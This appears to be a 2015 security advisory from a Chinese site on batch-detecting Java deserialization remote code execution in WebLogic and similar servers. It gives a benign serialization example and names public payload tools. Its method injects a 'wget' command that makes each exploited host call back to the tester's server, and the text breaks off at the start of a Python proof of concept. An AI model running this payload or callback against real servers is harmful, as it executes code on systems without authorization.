Java deserialization vulnerability batch testing - vulnerability warning - 黑吧安全网 (myhack58)

ID MYHACK58:62201569328
Type myhack58
Reporter 魔方安全团队 (Rubik's Cube Security Team)
Modified 2015-11-24T00:00:00


Foreword

Java deserialization vulnerabilities have been in the public eye for some time. The Rubik's Cube security team (魔方安全团队) reproduced the vulnerability and, in the course of that work, arrived at a high-accuracy approach to batch detection, which we share here with our friends in the security community.

Background

On November 6, 2015, @breenmachine of the FoxGlove Security team published a blog post showing how a Java deserialization vulnerability can be used to attack the latest versions of WebLogic, WebSphere, JBoss, Jenkins and OpenNMS, all well-known Java applications, and achieve remote code execution. In fact, as early as January 28, 2015, the foreign security researchers Gabriel Lawrence and Chris Frohoff gave a talk at AppSecCali pointing out that a Java deserialization vulnerability can use the commonly used Apache Commons Collections library to achieve arbitrary code execution.

Java deserialization vulnerability profile

Serialization converts an object into a byte stream so that it can be stored in memory, in a file or in a database; deserialization is the inverse process, restoring the byte stream to the corresponding object. In Java, the writeObject() method of ObjectOutputStream performs serialization and the readObject() method of ObjectInputStream performs deserialization. The following sample code first serializes a String object and stores it in a local file, then restores it by deserialization:

    import java.io.*;

    public class SerializeDemo {
        public static void main(String args[]) throws Exception {
            String obj = "hello world!";
            // Write the serialized object to the file object.db
            FileOutputStream fos = new FileOutputStream("object.db");
            ObjectOutputStream os = new ObjectOutputStream(fos);
            os.writeObject(obj);
            os.close();
            // Read the data back from the file object.db
            FileInputStream fis = new FileInputStream("object.db");
            ObjectInputStream ois = new ObjectInputStream(fis);
            // Recover the object by deserialization
            String obj2 = (String) ois.readObject();
            ois.close();
        }
    }

The problem is that if a Java application deserializes user input, that is, untrusted data, an attacker can construct malicious input that makes deserialization produce an unexpected object, and constructing that unexpected object may lead to arbitrary code execution. The root of the problem is that ObjectInputStream places no restriction on the type of object it creates during deserialization; if deserialization could be restricted to a whitelist of Java types, the impact of the issue would be much smaller. This article does not describe the principle of the vulnerability in detail; refer to the detailed analysis published by Chaitin Tech (长亭科技) at the beginning of November: "Lib's fault? Java deserialization vulnerability general exploitation analysis".

Vulnerability detection

Detection tools

Tools for exploiting this vulnerability already exist, including ysoserial, written by foreign researchers, and serial.jar, written by researchers in China; both generate the attack payload.

Detection idea

Topology:

[Image: detection topology]

Because no way has yet been found to echo the result of the command directly, simply inspecting the returned packet cannot accurately determine whether the vulnerability exists, so we use a third-party (out-of-band) method for batch checking. The detection server sends the payload to the tested host; the tested host executes the remote command, which accesses a web service opened on the test server. We then log in to the test server and examine its web access log: if the IP address of the tested host appears in the log, the tested host executed the command, which confirms that the vulnerability exists.
Taking WebLogic, the most common case in this test, as an example: we use the tool to generate the payload, and the command executed by the payload is

    wget http://x.x.x.x/libreversex.html

where x.x.x.x is the IP of the test server we set up to receive the wget requests.

We then modified the foreign POC, adding code at the end that remotely reads the test server's log and checks whether the IP address is present. To read the target server's access log remotely we use a trick: make a hard link from the web server's access log into a web directory, so the web log can be fetched directly over HTTP and compared, confirming whether the IP is present and therefore whether the vulnerability exists:

[Image: modified POC]

Run results:

[Image: run results]

During batch testing we found that it is not only port 7001 that is vulnerable; on some sites port 80 is vulnerable as well, because any port that accepts the T3 protocol is affected.

Detection method summary

Advantages: the method detects the vulnerability by actually executing a command and observing the result, so its accuracy is high.

Disadvantages:
1. If a network firewall prevents the internal host from actively connecting outward, detection fails, so false negatives are possible.
2. Windows hosts have no wget command, so this method cannot be used on them.

Detection test code

The following is the WebLogic POC, using the BBT framework:

#!/usr/bin/env python

import socket
import sys
import requests
import base64
import string
import urlparse
import os
import time

from baseframe import BaseFrame

class MyPoc(BaseFrame):
    poc_info = {
        # poc related information
